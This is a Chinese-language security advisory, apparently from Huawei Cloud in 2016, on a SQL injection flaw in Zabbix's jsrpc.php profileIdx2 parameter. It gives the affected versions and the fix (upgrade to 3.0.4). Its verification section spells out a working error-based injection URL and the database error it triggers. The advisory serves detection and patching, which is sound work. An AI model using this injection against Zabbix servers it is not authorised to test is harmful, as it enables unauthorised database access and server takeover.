服务公告

全部公告 > 安全公告 > 安全预警: Zabbix jsrpc.php SQL注入漏洞预警

安全预警: Zabbix jsrpc.php SQL注入漏洞预警

2016-08-18

一、概要

Zabbix中jsrpc.php的profileIdx2参数存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,可直接获取zabbix服务器的操作系统权限。

二、漏洞级别

漏洞级别:紧急。

(说明:漏洞级别共四级:一般、重要、严重、紧急。)

三、影响范围

Zabbix 2.2.x

Zabbix 3.0.0 - 3.0.3

四、验证方法

在您的zabbix的地址后面加上如下url:

jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

如果输出以下结果,则表示存在漏洞:

 <table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">Session terminated, re-login, please.</li></ul></td></tr></table><div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (191, 2, 'web.item.graph.period', '3600', 2, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (192, 2, 'web.item.graph.stime', '20160817050632', 3, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (193, 2, 'web.item.graph.isnow', '0', 2, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li></ul></td></tr></table>

 

五、修复方案

建议将Zabbix升级至3.0.4或以上版本。

Zabbix官方地址:http://www.zabbix.com



华为云服务客户服务中心
2016年8月18日